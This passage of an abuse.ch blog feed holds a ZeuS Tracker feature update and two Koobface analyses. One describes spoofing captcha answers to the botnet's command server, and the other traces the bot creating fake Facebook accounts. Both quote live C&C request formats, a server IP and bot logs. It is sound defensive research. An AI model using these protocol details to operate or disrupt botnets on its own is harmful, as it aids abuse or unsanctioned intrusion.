<li>Malwaredomainlist (MDL): <a href="http://www.malwaredomainlist.com/" target="_blank" title="Malwaredomainlist (MDL)">www.malwaredomainlist.com</a></li>
<li>MalwareURL: <a href="http://www.malwareurl.com/" target="_blank" title="MalwareURL">www.malwareurl.com</a></li>
<li>SURBL: <a href="http://www.surbl.org/" target="_blank" title="SURBL">www.surbl.org</a></li>
<li>OpenDNS*: <a href="http://www.opendns.com/" target="_blank" title="OpenDNS">www.opendns.com</a></li>
<li>Emerging Threats: <a href="http://www.emergingthreats.net/" target="_blank" title="Emerging Threats">www.emergingthreats.net</a></li>
<li>Autoshun: <a href="http://www.autoshun.org/" target="_blank" title="Emerging Threats">www.autoshun.org</a></li>
</ul>
<p><em>* Used in their commercial products</em></p>
<p>As you might have noticed, ZeuS Tracker is now providing the ZeuS Tracker blocklist to  <strong>SURBL</strong>. So every mailserver which is using SURBL in their spamfilter now automatically benefits from ZeuS Tracker domain block list.</p>
<p>Last but not least there are dozens of companies, universities and governmental organisations which are using the ZeuS Tracker blocklist to protect their users.</p>
<h4>New Features</h4>
<p>During the last few months several new features were added to ZeuS Tracker. Some of them are already public for a few months (but were never announced officially) and others have been finally launched today:<br />
<strong>Anubis reports for binaries</strong><br />
The ZeuS Tracker is now providing you a <em>Anubis report</em> (<strong>An</strong>alyzing <strong>U</strong>known <strong>Bin</strong>arie<strong>s</strong>) for every binary which is in ZeuS Tracker. For those of you who don&#8217;t know anubis:</p>
<div class="codesnip-container" >[...] Anubis is a tool for analyzing the behavior of Windows PE-executables with special focus on the analysis of malware. Execution of Anubis results in the generation of a report file that contains enough information to give a human user a very good impression about the purpose and the actions of the analyzed binary. [...]</div>
<p>See <a href="http://anubis.iseclab.org/?action=about" target="_blank" title="Anubis FAQ">anubis.iseclab.org/?action=about</a></p>
<p>Each binary on ZeuS Tracker has now a link to the associated Anubis report on <em>anubis.iseclab.org</em>. The benefit of the anubis reports is that it shows you several interesting information about the binary. For this purpose Anubis executes the binary in an emulated enviroment and traces the changes which the binary made to the computer. For example this include the changes made to the file system and windows registry as well as recording the network activities which the binaries makes while and after its execution.</p>
<p><strong>Responsible Nameservers</strong><br />
I&#8217;ve added a namserver lookup functionality to the ZeuS Tracker cron script which now looks up the responsible nameservers of the ZeuS C&#038;C domains which are listed in ZeuS Tracker (of course that&#8217;s just used for the ZeuS domains and not the IP addresses).</p>
<p>If you click on a domain which is on ZeuS Tracker it displays automatically the responsible nameserver. The text is a hyperlink, so when you click on it you will get a list of ZeuS C&#038;C domains which are using the same nameserver(s). There is also a interessting break down of the top twenty nameservers used by ZeuS C&#038;C servers on the <a href="https://zeustracker.abuse.ch/statistic.php" target="_blank" title="ZeuS statistics">ZeuS Tracker statistic page</a>.</p>
<p>The goal of this new features is to provide the ISPs, CERTs and LEs (law enforcement) a better overview to the current hot spots. Additionally a nameserver-provider can now easily get a list of malicious ZeuS domains which he is responsible for and can take action agains the threat.</p>
<p><strong>Sponsoring Registrar</strong><br />
Additionally to the nameserver lookup function the ZeuS Tracker cron script now also looks up the <em>sponsoring domain registrar</em> of a ZeuS C&#038;C domain. Unfortunately it&#8217;s not as easy to get the sponsoring registrar of a domain. Therefore this feature is not available for all domains which are listed in ZeuS Tracker (approximately only 70%-80% of the domains which are on ZeuS Tracker currently are showing up the sponsoring domain registrar).</p>
<p>If you click on a domain which is on ZeuS Tracker it displays automatically the sponsoring registrars. The <em>sponsoring registrar</em> is a hyperlink, so when you click on it you will get a list of ZeuS  domains which are also registered thru the same sponsoring registrar. There is also a interessting break down of the top ten sponsoring registrars on the <a href="https://zeustracker.abuse.ch/statistic.php" target="_blank" title="ZeuS statistics">ZeuS Tracker statistic page</a>.</p>
<p>The benefit of this features is the same as for the responsible nameservers: Providing a collection of information for the responsible ISPs and CERTs as well as for the LEs (law enforcement).</p>
<p><strong>NEW! ZeuS Tracker DNS Service (ZTDNS)</strong><br />
Another new feature is the <em>ZeuS Tracker DNS Service</em> (ZTDNS). First of all: What you definitly should NOT do is to use ZeuS Tracker DNS Service at a Email gateway. The service has been designed to be used by security experts and IT professionals to look up a domain on ZeuS Tracker quickly and NOT for mail cleaning. </p>
<p>The service works similar to a normal DNS blackhole list (DNSBL): You can check an <em>IP address</em> or a <em>Domain name</em> against the ZeuS Tracker DNS Service. If the IP address/domain is listed on ZeuS Tracker, you will get a positive response from the DNS daemon. You can request an A or TXT record. There are <em>two</em> DNS zones available:</p>
<ul>
<li><strong>ipbl</strong>.zeustracker.abuse.ch (used to check a <strong>IP address</strong> against the ZT IP blocklist)</li>
<li><strong>uribl</strong>.zeustracker.abuse.ch (used to check a <strong>domain name</strong> against the ZT URL blocklist)</li>
</ul>
<p>Requesting the <strong>A record</strong> will just return you the information whether a IP/domain is listed on ZeuS Tracker or not while the <strong>TXT record</strong> shows up more information like SBL status, country code, AS number etc.</p>
<p>Before you&#8217;re going to start using ZeuS Tracker DNS Service please be sure that you <a href="https://zeustracker.abuse.ch/ztdns.php" target="_blank">read the ZTDNS page</a>.</p>
<p><strong>Domain history</strong><br />
I&#8217;ve been asked for a domain history. Here it is: With the new <em>domain-history</em> feature it is now possible to take a look at the history of a ZeuS domain listed on ZeuS Tracker. It shows up the latest IPs that have hosted the domain before. This additional information can be quite interessting.</p>
<p><strong>NEW! Binary &#038; Config-file history</strong><br />
Additionally to the <em>domain history feature</em> I&#8217;ve added a history-function for the <em>binaries</em> and <em>config files</em> on ZeuS Tracker. When the MD5 of a binary or a config file changes it will be archived and added to the binary- or config-history. So you are now able to see how often a binary or config file on a specified ZeuS C&#038;C rotates and if the file was already seen on other ZeuS C&#038;Cs before.</p>
<h4>Changelog</h4>
<p>Beside the new features some minor changes were made to ZeuS Tracker:</p>
<ul>
<li>You can now sort the <a href="https://zeustracker.abuse.ch/monitor.php?filter=lastupdated">ZT monitor page</a> by <em>lastupdated</em></li>
<li>I&#8217;ve revised ZT&#8217;s statistic page. There are now some nice graphics which shows you some interesting statistics about the ZeuS crimeware</li>
<li>A handful small changes on the <a href="https://zeustracker.abuse.ch/" target="_blank" title="ZeuS Tracker">ZeuS Tracker startpage</a></li>
<li>You can download all ZeuS configs or binaries packed in a zip file (see FAQ)</li>
</ul>
<h4>TODOs</h4>
<p>Well there are still a few things left to do on ZeuS Tracker:</p>
<ul>
<li>Creating a RSS feed for <em>domain registrars</em></li>
<li>Creating a RSS feed for <em>nameservers</em></li>
</ul>
<p>Certainly, if you have some good ideas or feature requests don&#8217;t hesitate to drop me a line (<a href="http://www.abuse.ch/?page_id=377" target="_blank" title="contact form">contact form</a>).</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2363' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2363&amp;title=Happy Birthday ZeuS Tracker!' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2363&amp;title=Happy Birthday ZeuS Tracker!' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2363' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2363&amp;title=Happy Birthday ZeuS Tracker!' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2363&amp;bm_description=Happy Birthday ZeuS Tracker!' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2363&amp;t=Happy Birthday ZeuS Tracker!' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2363&amp;title=Happy Birthday ZeuS Tracker!' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2363' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2363#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/kYRMxvyxXU6QYf0Fv5r7TNuV15g/0/da"><img src="http://feedads.g.doubleclick.net/~a/kYRMxvyxXU6QYf0Fv5r7TNuV15g/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/kYRMxvyxXU6QYf0Fv5r7TNuV15g/1/da"><img src="http://feedads.g.doubleclick.net/~a/kYRMxvyxXU6QYf0Fv5r7TNuV15g/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/IKrCKBX2oFE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2363</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2363</feedburner:origLink></item>
		<item>
		<title>Breaking Koobface’s Captcha Solving Process</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/olAzDVNfZ6Y/</link>
		<comments>http://www.abuse.ch/?p=2330#comments</comments>
		<pubDate>Sun, 24 Jan 2010 15:08:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware & Virus Analysing]]></category>
		<category><![CDATA[Koobface]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[uuu20091124.info]]></category>
		<category><![CDATA[v2captcha.exe]]></category>
		<category><![CDATA[v2newblogger.exe]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2330</guid>
		<description><![CDATA[It was a cold sunday so I decided to play a little bit with  Koobface’s captcha breaking infrastructure. 
I asked myself: Is it be possible to poisoning Koobface’s captcha breaking infrastructure by spoofing captcha results? As I documented in my post Koobface – the social network trojan, the captcha breaking process used by trojan [...]]]></description>
			<content:encoded><![CDATA[<p>It was a cold sunday so I decided to play a little bit with  <a href="http://www.abuse.ch/wp-content/koobface_captchabreaking_infrastructure.jpg" target="_blank">Koobface’s captcha breaking infrastructure</a>. </p>
<p>I asked myself: Is it be possible to poisoning Koobface’s captcha breaking infrastructure by spoofing captcha results? As I documented in my post <a href="http://www.abuse.ch/?p=2103" target="_blank">Koobface – the social network trojan</a>, the captcha breaking process used by trojan Koobface works as follow:</p>
<p><a href="http://www.abuse.ch/wp-content/koobface_captchabreaking_infrastructure.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_captchabreaking_infrastructure-300x236.jpg" alt="" title="Koobface captcha breaking infrastructure" width="300" height="236" class="aligncenter size-medium wp-image-2219" /></a></p>
<ol>
<li>A bot would like to create a spoofed account (on Blogspot, Facebook, Myspace or whatever)</li>
<li>The register page is protected with a captcha &#8211; so the bot grabs and send it to the C&#038;C Server (<em>uuu20091124.info</em>)</li>
<li>Another infected computer asks the C&#038;C server for work to do at the same time</li>
<li>The C&#038;C server sends the captcha to the infected client where the user of the computer solves the captcha</li>
<li>The infected computer sends the result of the captcha back to the C&#038;C</li>
<li>The bot that originally sent the captcha now asks the C&#038;C server if there is already a resolution for the captcha</li>
<li>If so, the C&#038;C server returns the result of the captcha back to the bot</li>
<li>The bot can successfully register the spoofed account.</li>
</ol>
<p>It&#8217;s pretty simple, so I decided to write a small script which simulates Koobface’s captcha breaking module (<strong>v2captcha.exe</strong>) .</p>
<p>After writing some lines of code, I ran my script. The script just asks the C&#038;C server for new captchas to break, generates spoofed captcha results and sends them back to the C&#038;C server:</p>
<div class="codesnip-container" >[17] 89.xxx.xxx.xx:3128 -> badboys -> 21303067 -> Success (145)<br />
[16] 190.xxx.xxx.xxx:80 -> badboys -> 21303101 -> Success (146)<br />
[10] 200.xxx.xxx.xxx:3128 -> badboys -> 21302809 -> Success (147)<br />
[12] 191.xxx.xxx.xxx:8090 -> badboys -> 21303105 -> Success (148)<br />
[18] 58.xxx.xxx.xxx:80 -> badboys -> 21302778 -> Success (149)<br />
[22] 71.xxx.xxx.xxx:3128 -> badboys -> 21302802 -> Success (150)<br />
[5] 64.xxx.xxx.xxx:8080 -> badboys -> 21302801 -> Success (151)<br />
[19] 212.xxx.xxx.xxx:81 -> badboys -> 21303079 -> Success (152)<br />
[1] 84.xxx.xxx.xxx:80 -> badboys -> 2130312 -> Success (153)<br />
[8] 93.xxx.xxx.xxx:8080 -> badboys -> 21303115 -> Success (154)<br />
[4] 77.xxx.xxx.xxx:3128 -> badboys -> 21302775 -> Success (155)</div>
<p>Some words about the output of the script: the value <em>[xx]</em> is the thread ID of the procees, followed by <em>proxy:port</em>, followed by a string (&#8220;badboys&#8221;) that&#8217;s returned as faked solution for the captcha, the TaskID (previously received from the C&#038;C server), the response of the C&#038;C server and finally the number of spoofed captchas so far:</p>
<div class="codesnip-container" >[ThreadID] proxy:port -> spoofed captcha result -> TaskID -> status (counter)</div>
<p>To make sure that the spoofed captchas are really accepted by the Koobface Command&#038;Control server (C&#038;C), I just infected a computer with Koobface’s Blogspot (<strong>v2newblogger.exe</strong>) module which is beeing used to create faked blogspot accounts. Afterwards I started my script again.</p>
<p>First of all the infected computer tries to register a new blogspot account. As excepted, the trojan grabs the captcha and sends it to the C&#038;C server <em>uuu20091124.info</em> by using HTTP POST and calling the <em>action save</em> (a=save).</p>
<div class="codesnip-container" >POST /captcha/?a=save&#038;b=goo HTTP/1.0<br />
Host: uuu20091124.info<br />
Content-Type: binary/octet-stream<br />
Connection: close<br />
Content-Length: 2762</div>
<p>The C&#038;C server responds with a <em>HTTP 200 OK</em> and returns a TaskID:</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Date: Sun, 17 Jan 2010 16:12:19 GMT<br />
Server: Apache/1.3.41 (Unix)<br />
Cache-Control: no-cache<br />
Connection: close<br />
Content-Type: text/html</p>
<p><strong>21300807</strong></div>
<p>As you can see, the C&#038;C server told the bot to use the TaskID <strong>21300807</strong> for further requests concerning this job.</p>
<p>In parallel, our script diligently asks for new tasks and &#8220;solves&#8221; them by sending  a faked string back to the server. After a few seconds that looks like this:</p>
<div class="codesnip-container" >[9] 189.xxx.xxx.xxx:3128 -> badboys-> 21300821 -> Success (1330)<br />
[22] 78.xxx.xxx.xxx:3128 -> badboys -> 21300812 -> Success (1331)<br />
[4] 200.xxx.xxx.xxx:81 -> badboys -> <strong>21300807</strong> -> Success (1332)<br />
[3] 41.xxx.xxx.xxx:8080 -> badboys -> 21300776 -> Success (1333)<br />
[14] 94.xxx.xxx.xxx:3128 -> Unsuccessful<br />
[4] 174.xxx.xxx.xxx:80 -> badboys -> 21300802 -> Success (1334)</div>
<p>Did you see it? Our script received the captcha with the TaskID <strong>21300807</strong> and has sent back the word &#8220;badboys&#8221; as resolution. That&#8217;s the captcha from our bot! Now let&#8217;s go back to the bot and check what answer it gets from the C&#038;C server for the captcha submitted a few seconds before:</p>
<div class="codesnip-container" >GET /captcha/?a=query&#038;b=goo&#038;id=<strong>21300807</strong> HTTP/1.0<br />
Host: uuu20091124.info<br />
Connection: close</div>
<p>The bot asks the server if the captcha is already solved by calling the <em>action &#8220;query&#8221;</em> (a=query) and using the TaskID <strong>21300807</strong>. The C&#038;C server respond:</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Server: Apache/1.3.41 (Unix)<br />
Cache-Control: no-cache<br />
Connection: close<br />
Content-Type: text/html</p>
<p>3|<strong>badboy</strong></div>
<p>Strike! The bot recived <strong>badboy</strong> as resolution of the captcha &#8211; the captcha spoofing works!<br />
Let&#8217;s run our script for some more minutes:</p>
<div class="codesnip-container" ><strong>2297</strong> seconds elapsed, spoofed <strong>4438</strong> captchas (119 unsuccessful).</div>
<p>Okey, that&#8217;s really nice. Within around 45 minutes more than <strong>4&#8242;400</strong> captchas could be spoofed!</p>
<p>You may ask yourself why the spoofing is so simple. There are several reasons:</p>
<ul>
<li>Koobface is not doing any authentification of the bot</li>
<li>The C&#038;C traffic is not encrypted/obfuscated in any way (plain text)</li>
<li>The C&#038;C servers does only send the captcha to one bot for solving instead of sending the same captcha to different bots and comparing the results</li>
<li>There is no limit for sending results to the C&#038;C server</li>
<li>The server doesn&#8217;t even check if a returned task id was indeed assigned &#8211; you can just post any TaskID and the C&#038;C server will accept it</li>
</ul>
<p><strong>Conclusion</strong><br />
Koobface’s captcha breaking infrastrucutre is <strong>weak</strong>. Any IP address is allowed to send and receive tasks from Koobface’s C&#038;C servers. There is no authentification of the bot. So with a few simple lines of code you are able to disturbe Koobface’s captcha breaking infrastructure massively so that captcha breaking process is no longer useful. </p>
<p>A positiv effect of the captcha result spoofing is that it prevents the bot from successfully creating faked accounts on blogspot, Facebook, Myspace etc. As a result of this and due to the fact that Koobface needs such faked accounts on social network to spread itself, the koobface infection vectore is broken.</p>
<p>As mentioned in my earlier post, it seems that the Koobface gang is offering a <strong>Captcha Decoder Servis</strong>. By disturbing the captcha breaking process the Koobface gang will lose money with every captcha which could not be successfully solved.</p>
<p>Happy captcha spoofing! <img src='http://www.abuse.ch/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2330' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2330&amp;title=Breaking Koobface’s Captcha Solving Process' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2330&amp;title=Breaking Koobface’s Captcha Solving Process' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2330' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2330&amp;title=Breaking Koobface’s Captcha Solving Process' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2330&amp;bm_description=Breaking Koobface’s Captcha Solving Process' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2330&amp;t=Breaking Koobface’s Captcha Solving Process' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2330&amp;title=Breaking Koobface’s Captcha Solving Process' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2330' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2330#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/wQ5hPBzcOSobFFiL8yPw2AWwh2s/0/da"><img src="http://feedads.g.doubleclick.net/~a/wQ5hPBzcOSobFFiL8yPw2AWwh2s/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/wQ5hPBzcOSobFFiL8yPw2AWwh2s/1/da"><img src="http://feedads.g.doubleclick.net/~a/wQ5hPBzcOSobFFiL8yPw2AWwh2s/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/olAzDVNfZ6Y" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2330</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2330</feedburner:origLink></item>
		<item>
		<title>Dangerous friend requests on Facebook</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/hw_TOET6mQI/</link>
		<comments>http://www.abuse.ch/?p=2268#comments</comments>
		<pubDate>Sun, 10 Jan 2010 16:16:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware & Virus Analysing]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[friend request]]></category>
		<category><![CDATA[Koobface]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2268</guid>
		<description><![CDATA[While analyzing the Koobface trojan, I just made a interesting find. As mentioned in my post &#8220;Koobface – the social network trojan&#8221; from last year, Koobface uses social networks to spread itself. So let me ask you: What does a trojan need to spread itself on social networking sites? The answer is simple: A valid [...]]]></description>
			<content:encoded><![CDATA[<p>While analyzing the Koobface trojan, I just made a interesting find. As mentioned in my post <a href="http://www.abuse.ch/?p=2103" target="_blank">&#8220;Koobface – the social network trojan&#8221;</a> from last year, Koobface uses social networks to spread itself. So let me ask you: What does a trojan need to spread itself on social networking sites? The answer is simple: A valid account. The cybercriminal has two possiblities to obtain valid accounts: </p>
<ul>
<li>Using some phishing tricks to steal credentials</li>
<li>Creating fake accounts</li>
</ul>
<p>There are two reasons why most cybercriminals are trying to phish the credentials from users of social networking sites instead of creating fake accounts by their own:</p>
<ul>
<li>Most of the time the register forms of the social networking sites are protected with a <a href="http://en.wikipedia.org/wiki/CAPTCHA" target="_blank">captcha</a></li>
<li>At the moment, there is no reliable method to break captchas</li>
</ul>
<p>As described in my post about Koobface last year, the Koobface trojan is able to &#8220;break&#8221; captchas (to be correct, the trojan isn&#8217;t able to break captchas rather then it servs the captchas to the infected bots where the captchas will be solved by the users). By using this technique, he is able to create hundreds of faked accounts on social networks (per minute!).</p>
<p><strong>Creating malicious Facebook accounts</strong><br />
To spread itself, the trojan creates spoofed Facebook accounts on which he will post malicious comments and sends messages with a link to a malicious sites. For those of you who are not familiar with Facebook: Before you can write a message or create a message at the pinboard of somebody, you have to be a friend of this person. So before the Koobface trojan can start to post malicious messages he has to get some friends. Don&#8217;t be afraid, but even that is no problem for Koobface: It is able to send <em>friend requests</em> to hundreds of Facebook members.</p>
<p>When you log into Facebook, you&#8217;re browser will save a cookie on your computer. In fact Koobface uses the Internet Exporer installed on a infected computer to log into Facebook. So what would happen when you are infected with Koobface and you would try to access *your* personal Facebook account?</p>
<p><a href="http://www.abuse.ch/wp-content/koobface_facebookaccount.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_facebookaccount-300x217.jpg" alt="" title="Malicious Facebook account created by the Koobface trojan" width="300" height="217" class="aligncenter size-medium wp-image-2271" /></a></p>
<p>Uuuh?!?! What&#8217;s that? </p>
<p><a href="http://www.abuse.ch/wp-content/koobface_profileinfo.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_profileinfo-300x217.jpg" alt="" title="Fake Facebook profile created by Koobface" width="300" height="217" class="aligncenter size-medium wp-image-2297" /></a></p>
<p>That&#8217;s not my account ?!?! But who is <em>Anyeta Fecher</em>?<br />
The answer is simple: That&#8217;s an account which was created by Koobface. But how does that work? I will show you:</p>
<p>First of all the trojan sends a request to a zombie, calling the module <em>grgen</em>:</p>
<div class="codesnip-container" >POST /.sys/?action=grgen&#038;v=05 HTTP/1.1<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )<br />
Content-type: application/x-www-form-urlencoded<br />
Connection: close<br />
Content-Length: 0</div>
<p>The zombie/proxy will return some information about the account which the infected bot should create:</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Content-Type: text/html<br />
Connection: close</p>
<p>#BLACKLABEL<br />
SOFT|ADD<br />
LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq<br />
PASS|ci6h}r95df0<br />
ID|21375<br />
BIRTHDAY-YEAR|1982<br />
BIRTHDAY-MONTH|7<br />
BIRTHDAY-DAY|16<br />
LOGS|1<br />
[...]</p></div>
<p>Lets&#8217; take a deeper look at this response: The response will instruct the bot to create a new account (SOFT|ADD) using a email adresse (LOGIN) and password (PASS). The email address which is used by the LOGIN parameter as well as the password is scrambled (so you won&#8217;t be able to log in with these credentials). The zombie will return some more parameters like birthday, <em>Facebook groups</em> which the malicious account should join etc. The bot will now start with the registrartion of the account. During the registration process, he will get a captcha from Facebook which he will send to the C&#038;C server. As soon as the captcha is resolved, the C&#038;C server will return it to the bot which can now finish the registration process. </p>
<p>On the next step, the trojan will send a log back to the C&#038;C server with some information about the registration of the Facebook account:</p>
<div class="codesnip-container" >POST /log.php?id=21963&#038;soft=ADD&#038;build=0017 HTTP/1.1<br />
accept-encoding: text/html, text/plain<br />
COnnecTIon: cLOse<br />
Host: 61.235.117.83<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )<br />
Content-type: application/x-www-form-urlencoded<br />
Content-Length: 3759</p>
<p>20100109 16:38:53 ThreadID:1504 ProcID: 1516 reg build 0018<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 FB reg start<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 IE VERSION=7.0.5730.10<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 get work domain<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 create browser thread<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create google browser<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create main browser<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 getactivedomain<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 check inet<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 inet ok<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 trying<br />
20100109 16:38:53 ThreadID:1504 ProcID: 1516 xxxxxxx.xx<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 valid domain<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 work domain<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 wait inet begin<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 Request params<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 #BLACKLABEL<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 SOFT|ADD<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 PASS|ci6h}r95df0<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 ID|21375<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-YEAR|1982<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-MONTH|7<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-DAY|16<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGS|1<br />
20100109 16:38:54 ThreadID:1504 ProcID: 1516 switch to confirm mode<br />
